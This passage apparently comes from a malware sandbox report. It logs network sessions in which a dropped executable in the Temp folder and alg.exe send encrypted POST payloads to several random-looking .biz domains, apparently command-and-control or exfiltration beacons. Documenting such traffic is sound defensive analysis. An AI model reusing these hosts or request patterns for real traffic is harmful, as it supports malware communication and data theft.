                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=7eb3bfe955667a10c6a5af51541a76c7|155.94.241.187|1731920215|1731920215|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      5192.168.2.74990644.221.84.105802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:54.674051046 CET347OUTPOST /ybu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:54.674068928 CET844OUTData Raw: ad 04 7b 51 0d 50 93 5b 40 03 00 00 73 79 d5 f0 76 f9 ca 67 89 30 03 4e e5 bc 1f 4b 7b c6 13 72 cf b8 49 91 21 c8 9d 4d 01 e1 95 10 b2 1b 8f 48 72 63 ed b7 47 1f 5c cc 90 1c e6 bd 09 5c 8d a2 a3 f3 27 49 7a cd 14 0e 7f 55 d9 43 d0 0c dc 9a c5 fe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: {QP[@syvg0NK{rI!MHrcG\\'IzUC`]sP\z^>*>bH.?oj_WCv0hrA:Tw=MM8"=zKYfcswc)N;N)m+_iu8*[4m3
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.322782040 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:55 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=7763ece23f2bcaef7732bdfe8ba46658|155.94.241.187|1731920215|1731920215|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      6192.168.2.749907172.234.222.138802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.390551090 CET346OUTPOST /bya HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:55.390551090 CET844OUTData Raw: a3 0d 29 39 90 e8 fb e2 40 03 00 00 86 97 65 12 cd 5f af f6 01 52 82 01 f8 a7 e8 87 eb 50 06 a3 4c 11 94 d6 ba f8 07 44 f5 d6 6a 6e 0c 4c a1 18 39 c4 eb f6 ed 54 20 17 60 fb ad cf 35 fd bb c5 99 05 94 d5 83 18 72 60 21 42 49 1f 7e 18 7e 4a c0 50
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: )9@e_RPLDjnL9T `5r`!BI~~JPO=WV)!G".tZDTVlbF!Utvj4S4ticMvXJq'U2Q*la`~f`rd+;2%8.|`;Z*UKGOcy4r=T


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      7192.168.2.749913172.234.222.138802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.116128922 CET350OUTPOST /nchhums HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.116128922 CET844OUTData Raw: 36 9e 9c 6c 52 92 2a c9 40 03 00 00 fa 58 e7 88 f4 56 79 a8 0f fc dc fa 42 53 0f 92 11 d7 8a 83 e9 c0 b0 23 3a 89 61 9e 71 bb c0 37 7c 11 a6 f9 89 85 a7 4e bb 74 e2 8e 9c 4e 4b 4e e7 be 47 a9 18 f8 63 e4 0f 1b f8 e9 bc fe 22 79 41 14 f4 d3 b0 af
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 6lR*@XVyBS#:aq7|NtNKNGc"yA*Sn|eJ|}Sh>qOqzlx; APS*XN^GqN;+#.04K#\vZ#rJg*)Su2"`3cLA{1Pj


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      8192.168.2.74991454.244.188.177805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.134116888 CET348OUTPOST /chqlbpn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: cvgrf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.134138107 CET778OUTData Raw: 4c 27 74 20 d1 4e 17 30 fe 02 00 00 2f 2e 3f be 09 be 53 e7 99 70 0d c0 34 4e 8a 20 61 01 45 84 5f 47 9a a5 5e dd b9 d2 1d 9c 39 7b 54 42 3e 4d ff be 4a 82 08 9e 68 4e 57 f0 ef 47 38 33 93 cf e1 8e 11 57 0f b6 5d 09 fa 53 0a 68 30 b1 c6 80 0e c1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: L't N0/.?Sp4N aE_G^9{TB>MJhNWG83W]Sh0+%ddLPe}O]:_%YX"\/NxugwJY\-f^H~ +Oon_=x6b29~i$xRB 3JY[b+!?G
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:56.975410938 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=452e48ff18449f8d2b7e30e5ea4fab3f|155.94.241.187|1731920216|1731920216|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      9192.168.2.74992018.141.10.107802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.140130997 CET358OUTPOST /lwhipkemtkmayb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.140155077 CET844OUTData Raw: c5 b2 cb 92 fb b4 21 bc 40 03 00 00 97 52 bd c4 e7 35 8e 22 41 c7 3e 2e 61 a8 5f 30 7d 9d f5 3d ae ad 18 7f f1 00 b7 f0 32 62 d1 64 0e 6d 36 6f 74 45 e4 88 df 5f ce 00 d4 90 ef a9 e9 5b 78 16 68 c4 22 37 d5 19 60 cd 5d e7 e2 ce 59 4c 20 8a 3a 9c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: !@R5"A>.a_0}=2bdm6otE_[xh"7`]YL :yxb;CK&=,WmsxZ/!QbG\L)H.CLNC4g_8}I^B&i 6:pg(6w~I(pCEE^dG


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      10192.168.2.74992344.221.84.105805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.500550032 CET346OUTPOST /nu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:57.500576019 CET778OUTData Raw: 39 e2 d0 39 94 2d 16 2e fe 02 00 00 e4 f6 eb c8 97 55 15 d8 06 68 a5 ae e1 5c 96 55 bb 5b b3 69 14 9f e7 b9 27 b7 a4 f8 4b 94 1a 7c d1 3d c0 2b ba d3 cc e3 4c 23 6d d7 62 91 3c 38 82 f4 ef 5d 31 bd 6d 11 24 67 fc 97 ac 8e 03 25 13 33 fd 24 8a 9d
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 99-.Uh\U[i'K|=+L#mb<8]1m$g%3$C3:=oeJ@}]:\OV0B"X$oc/-%{>,2xC/-PT2kH-uL4{GBP"vszcQ$`R/)w
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.163077116 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=bde7841cd3385191658a4c052b067d8e|155.94.241.187|1731920218|1731920218|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      11192.168.2.74992918.141.10.107802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.361669064 CET360OUTPOST /obevglctnlfkacjm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.361788988 CET844OUTData Raw: 2f 39 ce 25 4d 02 4a 6c 40 03 00 00 81 d7 6b 9b 06 d1 e0 ce 2e a6 07 10 1d 22 8c 50 5c 47 d4 c0 25 20 1c 1f bb 1d f5 07 81 f7 52 63 15 dd d3 92 f7 f5 85 14 fa 72 3a 05 57 d6 12 70 bf 0d 42 5e 35 82 46 2a a1 3e 9b dd 63 dd dc 41 fa 41 6e a2 b8 44
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: /9%MJl@k."P\G% Rcr:WpB^5F*>cAAnDwir_(g/XJOPd< 8;q\A.*UYX] 7]q{=*5IFXn+egQJS\6G/WX28Hh7R,-~/WBGf&."i
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.818535089 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:56:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=03f2927f2a80cdb53999fd255b607007|155.94.241.187|1731920219|1731920219|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      12192.168.2.749930172.234.222.138805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.832964897 CET354OUTPOST /ikqsakdpetf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:58.832992077 CET778OUTData Raw: 90 e6 73 ca be 2a 7f 5f fe 02 00 00 fc ee cb 25 ef 89 fd 12 14 a7 76 67 19 7a 30 87 7e 17 c8 f5 8b 46 9d bc e7 fd 4b 7c fb ce cc 34 e0 3c 55 80 e5 92 f2 f5 ca f2 aa 05 ea ea 3f e0 2d c3 27 5f dc 57 03 7c 9d 2d 20 06 48 71 fa c2 53 84 14 97 e9 9b
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: s*_%vgz0~FK|4<U?-'_W|- HqS4Rn)2P3E`L_hD"ag=YDR54D?m=_.h}PK>f5hPt8-$p|z@B;=n:ER6~SIS3


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      13192.168.2.74993682.112.184.197802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.913058996 CET355OUTPOST /hwverablwtpyp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:56:59.913085938 CET844OUTData Raw: 00 46 03 ce 5e 08 67 e2 40 03 00 00 52 dd 7a f4 94 76 ca a7 9a 6b 1a e0 56 47 64 4d 83 ae e7 09 47 d3 b5 be 74 34 a1 4d 31 5b b6 80 bb 05 36 3a bb 65 f2 35 c2 b2 56 52 91 d8 1b ae 5e 10 a0 04 40 77 64 8c 81 d1 45 84 25 33 af 62 d0 48 a9 be 94 3c
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: F^g@RzvkVGdMGt4M1[6:e5VR^@wdE%3bH<XNX.<:{>f"GP)gj{.8wEv!0/tx%xBu2gj`CD52D`s}Ai\@XV3$b#J=_79?D\XGtWES


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      14192.168.2.749941172.234.222.138805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.252940893 CET348OUTPOST /uspwu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: przvgke.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:00.252975941 CET778OUTData Raw: 64 e8 f2 c4 72 27 38 27 fe 02 00 00 27 18 6c dc 06 f8 6c ad 37 cc b2 2f 9c 6a 13 af 09 87 67 10 8a 24 82 28 09 68 83 4c a1 7a df b1 8d aa 0b df 4a 5d 24 67 1c fb e8 b9 31 16 c3 24 8f 11 d5 f1 dd 68 20 50 cc ce 40 58 b0 53 c2 4a cf 8e 9d d4 3b 60
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: dr'8''ll7/jg$(hLzJ]$g1$h P@XSJ;`m' c21Vn3eS@a%/U(!_\:<<.'y,Q\>"N=h+-p^$nt__9a\fCo0~u%$o}-V{


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      15192.168.2.74994718.141.10.107805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.297298908 CET345OUTPOST /j HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:01.297317028 CET778OUTData Raw: ef 90 55 ff 46 0e 88 93 fe 02 00 00 6d 41 ca f8 8a 9a a9 3c 1e 55 c8 5c 7c 12 97 fc a9 c9 f4 39 df f1 fd 2a b0 b4 97 d3 96 75 f1 1f bc eb 45 da 05 bb 95 93 4a a4 29 72 ed 4a 1d ed 91 c8 2f 80 bb f9 54 6b 38 76 de f4 81 68 56 4c 6b d4 df e9 13 c1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: UFmA<U\|9*uEJ)rJ/Tk8vhVLk]~r*:x;BuC89UvFjz"(~Y>,`d@?#'E1;Fk39[*CJ #0r_2lqXp7Kv?a-fmx<!
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.693962097 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:57:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=bea154ea47c5381d6b615a2c6ca18af3|155.94.241.187|1731920222|1731920222|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      16192.168.2.74995582.112.184.197802724C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.880629063 CET355OUTPOST /epvislkuanodp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: lpuegx.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 844
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:57:02.880681992 CET844OUTData Raw: 9c da 9f 43 2b e8 80 ba 40 03 00 00 b1 dd 9b c5 e2 d2 bd 51 7e af dc c8 11 48 7f 2d e1 b9 fa 29 cc cc 4b 9c 7d cb 4b 2f 39 b3 0a 4f ce 57 3f 12 eb 00 be 51 ea 54 13 be 77 80 e6 ca 70 b2 b2 5d 0a 97 37 5a 81 0a e4 66 31 fc 00 cc 86 ed 4c 92 60 81
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: C+@Q~H-)K}K/9OW?QTwp]7Zf1L`?o?hAL*bkbq8`W,r& DeVr_+lwCmzE+Y4tDge~3c]34\19k;KBNVG19"


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
